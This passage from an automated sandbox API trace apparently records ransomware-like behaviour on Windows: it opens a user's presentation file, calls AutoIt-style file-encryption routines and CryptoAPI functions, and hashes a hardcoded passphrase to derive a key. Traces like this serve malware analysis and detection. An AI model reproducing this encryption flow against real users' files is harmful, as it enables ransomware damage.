Size=0x4) returned 0x43e2ac0 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0082.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\rar_tjixyd14cwjz.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.057] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4e98 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.059] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.059] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.059] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0082.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0082.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0082.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0082.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cae20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0082.061] CloseHandle (hObject=0x298) returned 1 [0082.061] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.061] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0082.061] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7e98cd0, ftCreationTime.dwHighDateTime=0x1d5e5de, ftLastAccessTime.dwLowDateTime=0xc53e63e0, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xc53e63e0, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xadba, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="rar_tJIXYd14cWJz.odp", cAlternateFileName="RAR_TJ~1.ODP")) returned 0x41ac500 [0082.062] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0082.062] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0082.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0082.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0082.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0082.062] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4040) returned 1 [0082.063] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0082.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.063] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0082.063] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.063] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0082.063] CryptCreateHash (in: hProv=0x41a4040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0082.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.063] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0082.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.064] 